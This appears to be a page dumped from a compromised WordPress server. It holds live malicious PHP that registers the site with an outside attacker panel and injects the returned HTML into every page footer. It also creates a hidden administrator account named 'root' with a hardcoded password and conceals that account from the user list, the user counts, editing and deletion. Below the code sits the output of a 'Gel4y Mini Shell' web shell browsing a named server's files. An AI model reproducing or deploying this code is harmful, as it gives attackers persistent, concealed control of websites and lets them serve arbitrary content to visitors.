function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.164)
  • Path: ~/usr/share/python-wheels/
    Name Size Permission Action
    CacheControl-0.12.6-py2.py3-none-any.whl 27.366KB -rw-r--r--
    appdirs-1.4.3-py2.py3-none-any.whl 18.336KB -rw-r--r--
    certifi-2019.11.28-py2.py3-none-any.whl 160.695KB -rw-r--r--
    chardet-3.0.4-py2.py3-none-any.whl 138.171KB -rw-r--r--
    colorama-0.4.3-py2.py3-none-any.whl 24.506KB -rw-r--r--
    contextlib2-0.6.0-py2.py3-none-any.whl 16.785KB -rw-r--r--
    distlib-0.3.0-py2.py3-none-any.whl 148.464KB -rw-r--r--
    distro-1.4.0-py2.py3-none-any.whl 23.338KB -rw-r--r--
    html5lib-1.0.1-py2.py3-none-any.whl 117.207KB -rw-r--r--
    idna-2.8-py2.py3-none-any.whl 70.032KB -rw-r--r--
    ipaddr-2.2.0-py2.py3-none-any.whl 23.718KB -rw-r--r--
    lockfile-0.12.2-py2.py3-none-any.whl 21.457KB -rw-r--r--
    msgpack-0.6.2-py2.py3-none-any.whl 90.749KB -rw-r--r--
    packaging-20.3-py2.py3-none-any.whl 41.252KB -rw-r--r--
    pep517-0.8.2-py2.py3-none-any.whl 26.061KB -rw-r--r--
    pip-20.0.2-py2.py3-none-any.whl 256.289KB -rw-r--r--
    pkg_resources-0.0.0-py2.py3-none-any.whl 124.328KB -rw-r--r--
    progress-1.5-py2.py3-none-any.whl 17.136KB -rw-r--r--
    pyparsing-2.4.6-py2.py3-none-any.whl 75.286KB -rw-r--r--
    requests-2.22.0-py2.py3-none-any.whl 65.96KB -rw-r--r--
    retrying-1.3.3-py2.py3-none-any.whl 15.975KB -rw-r--r--
    setuptools-44.0.0-py2.py3-none-any.whl 466.265KB -rw-r--r--
    six-1.14.0-py2.py3-none-any.whl 19.781KB -rw-r--r--
    toml-0.10.0-py2.py3-none-any.whl 23.541KB -rw-r--r--
    urllib3-1.25.8-py2.py3-none-any.whl 124.455KB -rw-r--r--
    webencodings-0.5.1-py2.py3-none-any.whl 20.004KB -rw-r--r--
    wheel-0.34.2-py2.py3-none-any.whl 34.778KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet